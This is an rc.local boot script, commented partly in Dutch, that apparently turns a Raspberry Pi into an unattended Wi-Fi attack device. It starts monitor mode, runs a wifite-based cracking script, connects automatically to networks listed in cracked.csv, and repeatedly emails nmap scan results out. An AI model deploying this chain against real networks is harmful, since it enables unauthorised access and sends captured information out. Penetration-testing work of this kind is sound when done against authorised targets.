#!/bin/sh -e
#
# rc.local
#
# This script is executed at the end of each multiuser runlevel.
# Make sure that the script will "exit 0" on success or any other
# value on error.
#
# In order to enable or disable this script just change the execution
# bits.
#
# By default this script does nothing.

#stop network manager on startup(prevent wifite.py loop)
sudo /etc/init.d/network-manager stop &

#Put interface in monitor mode
sudo airmon-ng start wlan0 &

#use watch.sh om cracked.csv te monitoren en door te sturen bij veranderen

# Print the IP address
sleep 10

_IP=$(hostname -I) || true
if [ "$_IP" ]; then
 printf "My IP address is %s\n" "$_IP"
 cd /home/pi/Documents/PenPiScripts/
 python mailme.py &
 #Run wifite
 ./wifiCrack.sh &
fi

#use watch.sh om cracked.csv te monitoren en door te sturen bij veranderen
cd /home/pi/Documents/PenPiScripts/
sudo ./watch.sh ~/cracked.csv python wifiConnect.py &

#use watch.sh om de automailer.py met nmap telkens door te mailen
cd /home/pi/Documents/PenPiScripts/
sudo watch -n 10 sh ~/Documents/PenPiScripts/automailer.sh &

exit 0
